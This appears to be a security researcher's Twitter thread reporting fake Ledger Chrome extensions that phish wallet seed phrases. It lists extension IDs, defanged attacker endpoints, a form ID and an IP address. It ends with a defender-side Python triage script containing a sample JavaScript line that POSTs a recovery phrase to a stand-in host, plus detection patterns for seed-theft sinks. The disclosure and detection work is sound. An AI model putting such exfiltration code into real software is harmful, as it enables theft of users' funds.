
cc: @Ledger @Ledger_Support @googledevs
#cryptocurrency #security #phishing https://twitter.com/sniko_/status/1236346777814601728
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)
Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Delivered via @GoogleAds again, like the linked tweet in the OP
@ZDNet coverage of the previous fake extensions - some of these function the same (using Google Docs) but some don't - though they are similar
I recommend reading the writeup by @campuscodi in the linked tweet for a full understanding of what's happening https://twitter.com/MyCrypto/status/1236090921373990912

Extension ID: opmelhjohnmenjibglddlpmbpbocohck (~71 users)
Asks for seed phrases, posts to completssl[.]com/ssnd_t.php
Same backend as this Trezor one https://twitter.com/sniko_/status/1243917603745267712
cc: @ChromiumDev @Ledger @Ledger_Support
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension
Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)
Website: myledgernano[.]com (cc: @Cloudflare)
Sends phished seed phrases to POST /device/init/payload
173.212.230.221 is hosting suspicious domains (myledgernano[.]com originally pointed here before hiding behind Cloudflare)
Domains targeting @Trezor and @Ledger customers (cc: @Mutex_Lock)
https://pastebin.com/raw/CawRZkyw

Extension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)
Asks for seed phrases, posts to completssl[.]com/ssnd_1.php
Delivered via @GoogleAds
https://twitter.com/sniko_/status/1243946328520118273
cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore
Extension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)
Asks for seeds, posts to usermetrica[.]org/api_v1
cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore
Extension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)
Asks for seeds, posts to usermetrica[.]org/api_v1
cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstore
Extension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)
Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minified their JS and tried to obfuscate it
cc: @Ledger @Ledger_Support
#malware #bitcoin

Another fake Ledger extension on the Chrome website
Extension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)
Asks for seeds, posts to completssl[.]com/ssnd_1.php
cc: @Ledger @Ledger_Support
#malware #bitcoin

Another fake Ledger extension on the Chrome website - pushed via Google Ads
Extension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)
Asks for seeds, posts to usermetrica[.]org/api_v1/
cc: @Ledger @Ledger_Support @ChromiumDev
#malware #bitcoin

I've been quiet on this thread (and similar others) but still we are finding more and issuing takedowns.
A new malicious @Ledger extension has changed and started using Telegram as their c2...
Not the first time we are flooding a c2 - see quoted thread
https://twitter.com/sniko_/status/1202990606638878720
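As an added defender-side example (not code from the thread, from Ledger or from any of the extensions), a small triage check that applies the pattern these tweets document to an unpacked extension's script text: a seed-phrase prompt combined with a POST to a non-vendor host, a Google Forms formResponse URL, or the Telegram bot API used as C2. The sample script and the vendor allowlist are constructed assumptions.

```python
import re

# Constructed sample modelled on the behaviour described in the thread
# (reads a recovery phrase from the page, POSTs it to a non-vendor backend).
# Hypothetical host; not taken from any real extension.
SAMPLE_SCRIPT = """
const words = document.querySelector('#recovery-phrase').value;
fetch('https://example-backend.invalid/api_v1/', {method: 'POST', body: words});
"""

# Wording a seed-phrase phishing page typically uses (case-insensitive).
SEED_PROMPT = re.compile(
    r"(recovery|seed|secret)[\s_-]*(phrase|words)|mnemonic|\b(12|24)[\s-]*words?", re.I)
# Absolute URLs in the script: captures host and optional path.
URL_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)(/[^\s'"`)]*)?""")
# Exfil sinks the thread documents: Google Forms submissions and Telegram bots.
FORM_RESPONSE = re.compile(r"docs\.google\.com/forms/.*?/formResponse")
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot")

# Assumption: hosts the genuine vendor extension is allowed to contact.
VENDOR_HOSTS = {"ledger.com"}


def host_allowed(host, allowlist):
    """True when host is an allowlisted domain or a subdomain of one."""
    return any(host == h or host.endswith("." + h) for h in allowlist)


def triage_script(source, allowlist=VENDOR_HOSTS):
    """Return {'asks_for_seed': bool, 'exfil': [findings]} for one script."""
    exfil = []
    for m in URL_RE.finditer(source):
        host, path = m.group(1).lower(), m.group(2) or ""
        url = host + path
        if FORM_RESPONSE.search(url):
            exfil.append(f"Google Forms response sink: {url}")
        elif TELEGRAM_BOT.search(url):
            exfil.append(f"Telegram bot API used as C2: {host}")
        elif not host_allowed(host, allowlist):
            exfil.append(f"non-vendor host: {host}")
    return {"asks_for_seed": bool(SEED_PROMPT.search(source)), "exfil": exfil}


def is_suspicious(source, allowlist=VENDOR_HOSTS):
    """Flag only the combination: seed prompt AND an outbound sink."""
    r = triage_script(source, allowlist)
    return r["asks_for_seed"] and len(r["exfil"]) > 0


if __name__ == "__main__":
    print(triage_script(SAMPLE_SCRIPT), is_suspicious(SAMPLE_SCRIPT))
```

Minified or obfuscated scripts, as the thread notes for one extension, may hide the URL as concatenated strings, so treat a clean result as "nothing found by this check", not as a clean bill of health.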